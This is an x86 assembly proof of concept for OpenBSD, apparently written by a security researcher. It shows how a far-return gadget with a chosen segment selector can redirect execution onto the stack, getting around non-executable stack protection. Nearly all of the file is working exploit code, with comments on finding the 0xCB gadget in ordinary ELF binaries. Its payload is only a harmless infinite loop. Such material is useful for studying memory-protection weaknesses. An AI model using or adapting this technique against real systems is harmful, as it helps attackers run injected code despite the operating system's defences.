; OpenBSD far ret example
; julien@cr0.org
section .note.openbsd.ident align=2
    dd 8,4,1
    db 'OpenBSD',0
    dd 0
section .data
section .text

fret	db 0xCB
runstack:
jmp esp		; obviously we execute code on stack


global _start

_start:

;jmp 0x23:next

; This is our payload
push 0xFEEB	; shellcode (this is jmp -2)
push 0x17	; our segment selector 
push runstack	; this is the classic return address  
		; don't expect to have a jmp esp in real-life though ;)
push fret	; finding a static offset with 0xCB in standard ELF's .text
		; is very easy

; This is standard ret after we control the stack
ret